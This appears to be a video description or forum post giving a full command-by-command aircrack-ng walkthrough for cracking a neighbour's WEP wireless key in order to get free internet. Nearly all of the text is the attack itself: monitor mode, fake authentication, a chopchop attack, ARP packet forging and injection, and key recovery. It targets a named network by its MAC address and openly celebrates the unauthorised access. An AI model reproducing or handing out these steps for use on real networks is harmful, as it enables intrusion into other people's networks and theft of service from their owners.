Cracking my neighbors wireless network key from almost a block away. Now I can get FREE DSL Internet! So if you want DSL for FREE and your neighbors stupid and still using WEP, this is how to get the key! --- --- http://www.remote-exploit.org/backtrack.html http://www.aircrack-ng.org/ http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients http://www.aircrack-ng.org/doku.php?id=tutorial --- --- Original (1024x768) Video: http://www.mediafire.com/?atyi2omzhzi Resized (800x600) Video: http://www.mediafire.com/?zztxnmiomdk MP4 Video (480x360): http://www.mediafire.com/?chmz5yyxz3y --- --- 1} Download and Install 'BackTrack3 Linux' to a USB drive or a spare HDD. Don't install it to your current drive, as you could mess it up. 2} Make sure you have a compatible wireless adapter. http://www.aircrack-ng.org/doku.php?id=compatibility_drivers Depending on the adapter your using, you may need to install your drivers and/or patch them too according to the page above. ^ 3} In BackTrack3 Linux, open a terminal window and enter these commands: --- --- # iwconfig or # ifconfig (find your wireless interface name) {write down your mac address} ... # airodump-ng wlan0 (scans for wireless networks) {find the WEP network you want to crack and write down the network name, channel, and mac address} ... # airmon-ng start wlan0 1 (puts your wifi card in monitor mode on channel 1) {change 1 to the channel their network is on} ... # aireplay-ng -1 0 -e gsmeck -a 00:18:D1:CE:E1:F0 -h 00:40:0C:00:61:52 wlan0 (fake authentication) {-e = their network name, -a = their mac address, -h = your mac address, wlan0 = your wireless interface name} ... # aireplay-ng -4 -h 00:40:0C:00:61:52 -b 00:18:D1:CE:E1:F0 wlan0 (chopchop attack) {-h = your mac address, -b = their mac address, wlan0 = your wireless interface name} ... # packetforge-ng -0 -a 00:18:D1:CE:E1:F0 -h 00:40:0C:00:61:52 -k 255.255.255.255 -l 255.255.255.255 -y ... # replay_dec-0607-080523.xor -w arp-request (create an arp packet) {-a = their mac address, -h = your mac address, -y = file from the attack} ... # airodump-ng -c 1 --bssid 00:18:D1:CE:E1:F0 -w packets wlan0 {-c = channel of their network, --bssid = their mac address, -w = name for the captured packets, wlan0 = your wireless interface name} ... # aireplay-ng -1 0 -e gsmeck -a 00:18:D1:CE:E1:F0 -h 00:40:0C:00:61:52 wlan0 (fake authentication) {-e = their network name, -a = their mac address, -h = your mac address, wlan0 = your wireless interface name} ... # aireplay-ng -2 -r arp-request wlan0 (Inject the arp packet) ... # aircrack-ng -b 00:18:D1:CE:E1:F0 packets*.cap (obtain the WEP key) {-b = their mac address, packets*.cap = name for the captured packets} --- --- You won't get the 'ASCII' form of the key (letters and numbers/the 'actual' password/key), but the 'HEX' version,. You can still use this to log on. Just remember to remove the " : "s from the key.